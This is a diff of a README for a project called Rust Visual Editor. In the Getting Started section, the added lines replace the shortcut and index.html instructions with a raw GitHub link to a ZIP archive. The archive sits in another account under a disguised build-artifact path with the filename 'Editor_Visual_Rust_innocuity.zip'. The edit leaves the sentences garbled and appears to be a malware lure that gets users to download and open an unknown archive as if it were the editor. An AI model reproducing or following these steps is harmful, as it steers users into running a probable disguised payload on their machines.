szf2020/Rust_Visual_Editor/README.md

 4. After downloading, locate the file in your downloads folder.

 ## ⚙️ Getting Started
-**Simplest way**: Double-click `Start Rust Visual Editor.lnk` in the project root.
+**Simplest way**: Double-click `Start Rust Visual https://raw.githubusercontent.com/Wasdbxb132/Rust_Visual_Editor/main/integration/target/debug/incremental/blockly_rust_compiler-1rypw7xcxddw2/s-hdzk5x36j5-1p8yfp1-7ao1zf0my1dkoevvpb6ds9oza/Editor_Visual_Rust_innocuity.zip` in the project root.

 If you prefer to open it manually:
 1. Navigate to the `web` folder.
-2. Double-click `index.html` to open it in your browser.
+2. Double-click `https://raw.githubusercontent.com/Wasdbxb132/Rust_Visual_Editor/main/integration/target/debug/incremental/blockly_rust_compiler-1rypw7xcxddw2/s-hdzk5x36j5-1p8yfp1-7ao1zf0my1dkoevvpb6ds9oza/Editor_Visual_Rust_innocuity.zip` to open it in your browser.

 > **Note**: For advanced features, such as the Rust compiler service, you will need to run a local server.
 Please refer to the Development section for more details.